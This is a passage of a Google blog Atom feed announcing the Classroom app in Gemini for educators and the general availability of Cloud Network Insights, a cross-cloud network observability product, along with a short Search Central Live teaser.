    <content type="html">Educators have shared that AI is especially helpful when it understands the context of their teaching environment, from tailoring resources toward student needs or building on their existing materials. To support this, Gemini will be able to collaborate with your Google Classroom, using context from your classes to inform its outputs or help complete tasks. For example, educators can get insights on student progress and understanding, create resources and differentiated materials based on Classroom context, or get help drafting posts and assignments.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Students 18 and older can similarly use the Classroom app to stay organized across classes – from getting a list of upcoming assignments, creating study plans, doing test practice based on Classroom content, and staying up-to-date on the latest announcements. 

Based on your prompts, Gemini will identify when context from Google Classroom will be relevant, and use it to inform its outputs. You can also explicitly tell Gemini to use information from your Google Classroom account by typing, “@Classroom” and clicking on the Classroom app when it pops up.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For example, educators can ask Gemini to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Draft communications: &lt;/b&gt;Draft communications and posts based on your Google Classroom information.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Draft differentiated assignments and plans:&lt;/b&gt; Help draft and update assignments, and generate timelines and structured plans, based on information and content from your Google Classroom.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Understand student progress and take action: &lt;/b&gt;Summarize who has submitted assignments, how students have done on prior assignments, and identify where students might need additional teacher support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Streamline administrative tasks: &lt;/b&gt;Update assignment titles, descriptions, and more across multiple classes in draft mode, make seating charts, and find old assignments.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Important notes&lt;/h4&gt;&lt;div&gt;Gemini Apps can’t perform certain actions in the Google Classroom app, like:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Enter grades or provide private feedback directly&lt;/li&gt;&lt;li&gt;Delete, archive, or directly post assignments or announcements (it can post to draft)&lt;/li&gt;&lt;li&gt;Create rubrics&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;This feature will be available in English for users designated as over the age of 18 who are using a Google Workspace for Education or Business account in Classroom and Gemini. The Classroom app in Gemini does not currently support data regionalization and your usage data may be stored outside of your designated data region. Data region support for the Classroom app in Gemini is expected later this year.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Access to the Classroom app in Gemini will be ON by default for all Education domains and can be disabled at the OU or group level. For all other domains, access will be OFF by default and can be enabled at the OU or group level. Access can be turned on or off with a new &lt;b&gt;Classroom app&lt;/b&gt; setting in the Gemini section of the Admin console. Visit the Help Center to &lt;a href="https://support.google.com/a/answer/15293691" target="_blank"&gt;learn more about turning Google apps in Gemini on or off for your organization&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsSwnx0-luG6QMkZX0hbCxPOMJYkZ4SbUrKlHS1lBA7utg7BQ_kP3JiGWqK3j-TtnM6s0nOBQOZuzkiHrPV5eQVHXpwQfz8l1V1o7ZdGyj9OmoDfO1GGEYk_EvsTB28kTELBfMYYQRUi_swZCGHg4bP2emtS7hIWDaOav5NuO5IK655stJV9J-4K2S18i/s2048/Classroom%20Gemini%20App%20Admin.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Admin console settings to control Classroom in Gemini app" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsSwnx0-luG6QMkZX0hbCxPOMJYkZ4SbUrKlHS1lBA7utg7BQ_kP3JiGWqK3j-TtnM6s0nOBQOZuzkiHrPV5eQVHXpwQfz8l1V1o7ZdGyj9OmoDfO1GGEYk_EvsTB28kTELBfMYYQRUi_swZCGHg4bP2emtS7hIWDaOav5NuO5IK655stJV9J-4K2S18i/s16000/Classroom%20Gemini%20App%20Admin.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Your admin configuration will determine if you can use the Classroom app in Gemini. Access to the Classroom app in Gemini will be ON by default and can be disabled at the end user level in the connected apps section of the Gemini app settings. Visit the Help Center to &lt;a href="https://support.google.com/gemini/answer/14959807?sjid=5863818655263235588-NC" target="_blank"&gt;learn more about using apps connected to Gemini&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFxAVE6-f-KG1WIpQI48puSbC6zbzDCgIX3cnjmcyizek_Fsv8UntUeqSrkirlRzMFyUCGnV7SUU_X4j0SLgD7xkYEBgM1wz4gJONswLk0XrB1F0pdFrtF8bcwVdT_Jw85vKDQjkpRJlSh8-QUeGdtReFTHA9YgFSstpmCSapx3y-OlOUwCxl1-rcfXwjX/s2048/Classroom%20Gemini%20App%20User.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="End user settings to enable Classroom in Gemini app" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFxAVE6-f-KG1WIpQI48puSbC6zbzDCgIX3cnjmcyizek_Fsv8UntUeqSrkirlRzMFyUCGnV7SUU_X4j0SLgD7xkYEBgM1wz4gJONswLk0XrB1F0pdFrtF8bcwVdT_Jw85vKDQjkpRJlSh8-QUeGdtReFTHA9YgFSstpmCSapx3y-OlOUwCxl1-rcfXwjX/s16000/Classroom%20Gemini%20App%20User.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Rolling out now, with expected completion by June 18, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available in English to all Google Workspace customers who are 18 years or older and signed in to the Gemini app. &lt;a href="https://knowledge.workspace.google.com/admin/getting-started/editions/control-access-to-google-services-by-age" target="_blank"&gt;Learn more about age restrictions in Gemini app&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/16865250?sjid=764380175305792016-NC" target="_blank"&gt;Ask about your Google Classroom assignments, classes &amp;amp; more in Gemini Apps&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/15293691?hl=en" target="_blank"&gt;Turn apps in Gemini on or off&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/14959807?sjid=5863818655263235588-NC" target="_blank"&gt;Use apps connected to Gemini with a work or school Google Account&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T00:49:17+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/search/blog/2026/06/scl-deep-dive-europe-2026</id>
    <title>Help Us Pick the Next Stop in Europe for Search Central Live Deep Dive 2026!</title>
    <updated>2026-06-18T00:00:00+00:00</updated>
    <content type="html">&lt;p&gt;
      As we mentioned a
  few months ago,
  we are bringing the Search Central Live Deep Dive format to the EMEA region. This SCL format
  requires finding the absolute best home for the event&amp;amp;mdash;a place where all of you can truly
  connect, learn, and enjoy.
      &lt;/p&gt;</content>
    <link href="https://developers.google.com/search/blog/2026/06/scl-deep-dive-europe-2026" rel="alternate"/>
    <category term="Search Central"/>
    <published>2026-06-18T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/networking/cloud-network-insights-end-to-end-cross-cloud-observability</id>
    <title>Cloud Network Insights: end-to-end observability for the Cross-Cloud Network</title>
    <updated>2026-06-17T19:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In today’s digital landscape, the network is no longer confined to a single data center or even a single cloud provider. Enterprises are increasingly adopting cross-cloud strategies, connecting Google Cloud workloads to on-premises environments, other clouds like AWS and Azure, and a vast array of internet-facing applications. While this flexibility drives innovation, it can also introduce significant operational complexity. When a user experiences degradation in application performance, the critical question remains: Is it the network, the application, or something else?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the general availability of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/cloud-network-insights/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Network Insights&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an out-of-the-box, Google Cloud-native solution that provides comprehensive visibility into network and digital experience performance across complex multi-cloud, and hybrid environments.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Closing the visibility gap with active monitoring&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights, offered in &lt;/span&gt;&lt;a href="https://investors.broadcom.com/news-releases/news-release-details/broadcom-expands-collaboration-google-cloud-cloud-network" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;partnership with Broadcom AppNeta&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, expands your observability beyond Google Cloud to your entire global deployment. By utilizing active synthetic probing, the solution monitors network routes even when no user traffic is present, allowing teams to be proactive rather than reactive.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether the source of degradation is in the cloud, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;on-premises data centers, internet applications,&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ISPs, or last-mile connectivity, Cloud Network Insights helps you pinpoint the exact location of the bottleneck.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights integrates directly into the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Observability suite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, bringing sophisticated network intelligence into the tools you already use. With Cloud Network Insights, you get:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;End-to-end network path visibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Gain a hop-by-hop visualization of the network path between your sources and destinations. Monitor critical metrics like round-trip time (RTT), packet loss, and jitter across networks you don’t directly manage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Digital experience insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go beyond the network layer to monitor &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;digital experience for web applications&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. Measure DNS resolution times, HTTP response codes, and full browser page-load times to identify whether an application's degradation is due to the network or the application itself.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive detection and alerting:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use synthetic testing to identify performance dips before they impact your customers. Alarms are integrated with Cloud Monitoring and Cloud Logging, enabling alerting via email, Slack, or PagerDuty.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SLA validation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Arm your team with the data needed to verify if ISPs and service providers are meeting their performance commitments.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rapid root-cause analysis: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Quickly differentiate between network problems, application-level issues, or browser performance impacts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Integrated monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access metrics and logs directly within Google Cloud, leveraging Cloud Monitoring and Cloud Logging for dashboards and alerting. Utilize the open partner ecosystem of Google Cloud as well as support for the OpenTelemetry protocol for metrics and logs, allowing direct ingestion by OTel SDKs and collectors.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic workload monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use synthetic testing to monitor connectivity and network performance to help ensure optimal connectivity to your agents and tools.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1-network paths low res" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1-network_paths_low_res.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Network performance and multi-path routes to/from Google Cloud, AWS, and Azure in one view&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How it works: active synthetic probing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights uses active synthetic probing technology that consists of three main components: &lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitoring Points:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You deploy lightweight software agents, called Monitoring Points, into critical network segments, such as a central VPC, a remote branch, or an on-premises data center. These can be deployed as containers or virtual machines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Synthetic probes:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; These Monitoring Points send small, frequent bursts of synthetic traffic (simulating a user or application) to a target destination. This allows you to monitor performance 24/7, even when no real users are on the network.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data synchronization:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Monitoring Points send real-time performance telemetry to a central backend service. This data is then synchronized back to Google Cloud, with metrics exported to Cloud Monitoring, and alarms and events sent to Cloud Logging.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Core capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; supports two primary types of monitoring to give you a full picture of your infrastructure:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Network performance monitoring (Layers 3 and 4)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This provides a hop-by-hop visualization of the network between a source and a destination, including.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Metrics captured:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Round-trip time (RTT), packet loss, jitter, and path changes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Single-ended mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The agent probes an external target (like a URL, IP address or an API endpoint) that doesn't have a Monitoring Point installed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dual-ended mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Monitoring Point probes another Monitoring Point. This provides richer data, including precise one-way latency and the ability to detect asymmetric routing (when data takes a different path going out than it does coming back).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_d8twiu8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Network path metrics in Google Cloud console&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Digital experience monitoring (Layer 7)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With digital experience monitoring, you can track the end-to-end experience of a web application. Here, you can choose from:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Browser mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Uses a real browser engine (Selenium) to load full web pages, execute JavaScript, and render content. It measures complete page-load times to validate the actual user experience.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;HTTP mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Sends synthetic HTTP/S requests to a URL or API endpoint. This is a lightweight check for server availability, response time, and DNS/TLS performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_VbaHlX5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Intelligence and automation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights also offers a variety of monitoring and troubleshooting capabilities. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive alarms: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights leverages auto-baselining to establish dynamic performance thresholds based on your historical metric data. If a metric deviates from your defined parameters, the system instantly triggers an event in Google Cloud, routing alerts directly to your team via email, Slack, or PagerDuty.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitoring policies:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can automate monitoring setups across large-scale environments by defining policies that dynamically create or remove paths based on custom tags. For instance, you can automatically track a core web application's performance from specific geographic regions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Root-cause analysis:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because Cloud Network Insights extends visibility into traditionally "unwatched" areas like ISPs and transit networks, it instantly pinpoints whether a slowdown is occurring within Google Cloud, at the ISP level, or inside another cloud environment like AWS or Azure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-driven insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With integration to Gemini Cloud Assist, you can use natural language to interrogate Cloud Network Insights telemetry alongside your broader infrastructure data. Rather than manually pivoting between dashboards, ask Gemini to cross-reference specific Cloud Network Insights metrics against other Google Cloud metrics, reducing mean time to resolution (MTTR).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What customers are saying&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are already seeing strong interest from customers looking to simplify their cross-cloud operations. Organizations like Sabre and Pexip are already using Cloud Network Insights to gain clarity in their hybrid environments.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"In an environment as complex and high-scale as Sabre’s, total visibility isn't just a luxury — it's a requirement for operational resilience. Cloud Network Insights will enable us to further shift our posture towards proactive optimization. By providing granular, real-time telemetry across our global cloud footprint, it helps eliminate the traditional 'black box' of the network, allowing our teams to resolve bottlenecks before they impact the traveler experience." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;- Alfredo Rodriguez, VP of Cloud and Infrastructure, Sabre&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Cloud Network Insights closes the 'visibility gap' between the private corporate network and the public cloud, empowering our joint customers to pinpoint performance bottlenecks in seconds rather than hours.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Alan Davidson, CIO, Broadcom&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=MR6dUJKFU4I"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Pexip improves network health with Cloud Network Insights&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=MR6dUJKFU4I"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Navigating complex digital ecosystems shouldn't mean sacrificing visibility. Cloud Network Insights bridges the gap across multi-cloud and hybrid environments by combining deep network performance metrics with digital experience monitoring. Coupled with direct integrations into Google Cloud Observability and Gemini Cloud Assist, your teams are empowered with intelligent alerting, robust SLA validation, and rapid root-cause analysis. We look forward to helping you gain a clearer, unified view of your Cross-Cloud Network.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can get started in the Google Cloud &lt;/span&gt;&lt;a href="https://console.cloud.google.com/net-intelligence/cloud-network-insights/onboarding"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today. To learn more:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Explore our&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/cloud-network-insights/overview"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;product documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for deep dives into deploying Monitoring Points and configuring policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Check out the latest&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/release-notes"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;release notes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to stay updated on new features.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch the &lt;/span&gt;&lt;a href="https://youtu.be/KJ_Qrztildw?si=XKqpAM9yL44HqsR5" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;overview video&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hear more about the partnership between Google Cloud and Broadcom: &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://youtu.be/XNaFAI5JWnU?si=yLk9SaSK7BbUIxJb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Alan Davidson, CIO, Broadcom talks with Rob Enns, VP/GM, Google Cloud Networking&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://youtu.be/nBdUPRbEFYw?si=BOJx67Lulrl5QDVR" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Michel Melillo, Head of Network Observability, Broadcom chats with Raj Gulani, Director of Product Management, Google Cloud&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/networking/cloud-network-insights-end-to-end-cross-cloud-observability" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T19:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/networking/cloud-network-insights-end-to-end-cross-cloud-observability/</id>
    <title>Cloud Network Insights: end-to-end observability for the Cross-Cloud Network</title>
    <updated>2026-06-17T19:30:00+00:00</updated>
